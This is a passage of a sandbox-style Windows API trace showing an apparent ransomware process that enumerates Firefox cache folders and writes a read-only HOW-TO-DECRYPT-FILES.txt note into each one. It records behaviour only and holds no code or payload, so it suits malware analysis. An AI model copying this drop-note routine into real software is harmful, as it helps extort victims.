ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xb670)) returned 1 [0049.240] GetLastError () returned 0x12 [0049.240] SetErrorMode (uMode=0x0) returned 0x1 [0049.240] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.240] GetLastError () returned 0x12 [0049.240] SetErrorMode (uMode=0x1) returned 0x0 [0049.240] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\98\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.241] GetLastError () returned 0x0 [0049.241] GetFileType (hFile=0x184) returned 0x1 [0049.241] SetErrorMode (uMode=0x0) returned 0x1 [0049.241] GetFileType (hFile=0x184) returned 0x1 [0049.241] WriteFile (in: hFile=0x184, lpBuffer=0x1d16324*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1d16324*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.242] GetLastError () returned 0x0 [0049.242] CloseHandle (hObject=0x184) returned 1 [0049.242] GetLastError () returned 0x0 [0049.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.242] GetLastError () returned 0x0 [0049.242] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.242] GetLastError () returned 0x0 [0049.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", lpFilePart=0x0) returned 0x53 [0049.242] GetLastError () returned 0x0 [0049.242] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.242] GetLastError () returned 0x0 [0049.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.242] GetLastError () returned 0x0 [0049.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", lpFilePart=0x0) returned 0x53 [0049.242] GetLastError () returned 0x0 [0049.242] SetErrorMode (uMode=0x1) returned 0x0 [0049.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.243] GetLastError () returned 0x0 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.243] GetLastError () returned 0x0 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.243] GetLastError () returned 0x0 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.243] GetLastError () returned 0x12 [0049.243] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.243] SetErrorMode (uMode=0x0) returned 0x1 [0049.243] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8", lpFilePart=0x0) returned 0x53 [0049.243] GetLastError () returned 0x12 [0049.243] SetErrorMode (uMode=0x1) returned 0x0 [0049.243] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.243] GetLastError () returned 0x12 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.243] GetLastError () returned 0x12 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.243] GetLastError () returned 0x12 [0049.243] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.243] GetLastError () returned 0x12 [0049.243] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.244] SetErrorMode (uMode=0x0) returned 0x1 [0049.244] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\C3B7Bd01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\C3B7Bd01", lpFilePart=0x0) returned 0x5c [0049.244] GetLastError () returned 0x12 [0049.244] SetErrorMode (uMode=0x1) returned 0x0 [0049.244] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\a8\\c3b7bd01"), fInfoLevelId=0x0, lpFileInformation=0x1d19914 | out: lpFileInformation=0x1d19914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7286c370, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x7286c370, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x7286c370, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x4898)) returned 1 [0049.244] GetLastError () returned 0x12 [0049.244] SetErrorMode (uMode=0x0) returned 0x1 [0049.246] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.246] GetLastError () returned 0x12 [0049.246] SetErrorMode (uMode=0x1) returned 0x0 [0049.246] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\a8\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.246] GetLastError () returned 0x0 [0049.246] GetFileType (hFile=0x184) returned 0x1 [0049.246] SetErrorMode (uMode=0x0) returned 0x1 [0049.246] GetFileType (hFile=0x184) returned 0x1 [0049.246] WriteFile (in: hFile=0x184, lpBuffer=0x1b3a5d4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b3a5d4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.247] GetLastError () returned 0x0 [0049.247] CloseHandle (hObject=0x184) returned 1 [0049.247] GetLastError () returned 0x0 [0049.247] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.247] GetLastError () returned 0x0 [0049.247] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\A8\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.248] GetLastError () returned 0x0 [0049.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", lpFilePart=0x0) returned 0x53 [0049.248] GetLastError () returned 0x0 [0049.248] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.248] GetLastError () returned 0x0 [0049.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.248] GetLastError () returned 0x0 [0049.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", lpFilePart=0x0) returned 0x53 [0049.248] GetLastError () returned 0x0 [0049.248] SetErrorMode (uMode=0x1) returned 0x0 [0049.248] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.248] GetLastError () returned 0x0 [0049.248] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.248] GetLastError () returned 0x0 [0049.249] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.249] GetLastError () returned 0x0 [0049.249] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.249] GetLastError () returned 0x12 [0049.249] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.249] SetErrorMode (uMode=0x0) returned 0x1 [0049.249] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB", lpFilePart=0x0) returned 0x53 [0049.249] GetLastError () returned 0x12 [0049.249] SetErrorMode (uMode=0x1) returned 0x0 [0049.249] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.249] GetLastError () returned 0x12 [0049.249] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.249] GetLastError () returned 0x12 [0049.249] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.249] GetLastError () returned 0x12 [0049.250] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.250] GetLastError () returned 0x12 [0049.250] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.250] SetErrorMode (uMode=0x0) returned 0x1 [0049.250] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\44E8Cd01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\44E8Cd01", lpFilePart=0x0) returned 0x5c [0049.250] GetLastError () returned 0x12 [0049.250] SetErrorMode (uMode=0x1) returned 0x0 [0049.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\44E8Cd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\cb\\44e8cd01"), fInfoLevelId=0x0, lpFileInformation=0x1b3dbc4 | out: lpFileInformation=0x1b3dbc4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc48505f0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc48505f0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc48505f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x48ba)) returned 1 [0049.250] GetLastError () returned 0x12 [0049.250] SetErrorMode (uMode=0x0) returned 0x1 [0049.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.251] GetLastError () returned 0x12 [0049.251] SetErrorMode (uMode=0x1) returned 0x0 [0049.251] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\cb\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.251] GetLastError () returned 0x0 [0049.251] GetFileType (hFile=0x184) returned 0x1 [0049.251] SetErrorMode (uMode=0x0) returned 0x1 [0049.251] GetFileType (hFile=0x184) returned 0x1 [0049.251] WriteFile (in: hFile=0x184, lpBuffer=0x1b595bc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b595bc*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.252] GetLastError () returned 0x0 [0049.252] CloseHandle (hObject=0x184) returned 1 [0049.253] GetLastError () returned 0x0 [0049.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.253] GetLastError () returned 0x0 [0049.253] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\CB\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.253] GetLastError () returned 0x0 [0049.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", lpFilePart=0x0) returned 0x53 [0049.253] GetLastError () returned 0x0 [0049.253] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.253] GetLastError () returned 0x0 [0049.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.253] GetLastError () returned 0x0 [0049.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", lpFilePart=0x0) returned 0x53 [0049.253] GetLastError () returned 0x0 [0049.253] SetErrorMode (uMode=0x1) returned 0x0 [0049.253] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.254] GetLastError () returned 0x0 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.254] GetLastError () returned 0x0 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.254] GetLastError () returned 0x0 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.254] GetLastError () returned 0x12 [0049.254] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.254] SetErrorMode (uMode=0x0) returned 0x1 [0049.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4", lpFilePart=0x0) returned 0x53 [0049.254] GetLastError () returned 0x12 [0049.254] SetErrorMode (uMode=0x1) returned 0x0 [0049.254] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.254] GetLastError () returned 0x12 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.254] GetLastError () returned 0x12 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.254] GetLastError () returned 0x12 [0049.254] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.254] GetLastError () returned 0x12 [0049.255] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.255] SetErrorMode (uMode=0x0) returned 0x1 [0049.255] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\9ADE8d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\9ADE8d01", lpFilePart=0x0) returned 0x5c [0049.255] GetLastError () returned 0x12 [0049.255] SetErrorMode (uMode=0x1) returned 0x0 [0049.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\9ADE8d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\f4\\9ade8d01"), fInfoLevelId=0x0, lpFileInformation=0x1b5cbac | out: lpFileInformation=0x1b5cbac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc476bdb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc476bdb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc476bdb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x14658)) returned 1 [0049.255] GetLastError () returned 0x12 [0049.255] SetErrorMode (uMode=0x0) returned 0x1 [0049.255] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.255] GetLastError () returned 0x12 [0049.255] SetErrorMode (uMode=0x1) returned 0x0 [0049.255] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\f4\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.255] GetLastError () returned 0x0 [0049.255] GetFileType (hFile=0x184) returned 0x1 [0049.256] SetErrorMode (uMode=0x0) returned 0x1 [0049.256] GetFileType (hFile=0x184) returned 0x1 [0049.256] WriteFile (in: hFile=0x184, lpBuffer=0x1b7877c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b7877c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.256] GetLastError () returned 0x0 [0049.257] CloseHandle (hObject=0x184) returned 1 [0049.257] GetLastError () returned 0x0 [0049.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.257] GetLastError () returned 0x0 [0049.257] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\F4\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.257] GetLastError () returned 0x0 [0049.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", lpFilePart=0x0) returned 0x50 [0049.257] GetLastError () returned 0x0 [0049.257] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.257] GetLastError () returned 0x0 [0049.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.257] GetLastError () returned 0x0 [0049.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", lpFilePart=0x0) returned 0x50 [0049.257] GetLastError () returned 0x0 [0049.257] SetErrorMode (uMode=0x1) returned 0x0 [0049.257] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.257] GetLastError () returned 0x0 [0049.257] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.257] GetLastError () returned 0x0 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x0 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x0 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x0 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.258] GetLastError () returned 0x12 [0049.258] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.258] SetErrorMode (uMode=0x0) returned 0x1 [0049.258] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1", lpFilePart=0x0) returned 0x50 [0049.258] GetLastError () returned 0x12 [0049.258] SetErrorMode (uMode=0x1) returned 0x0 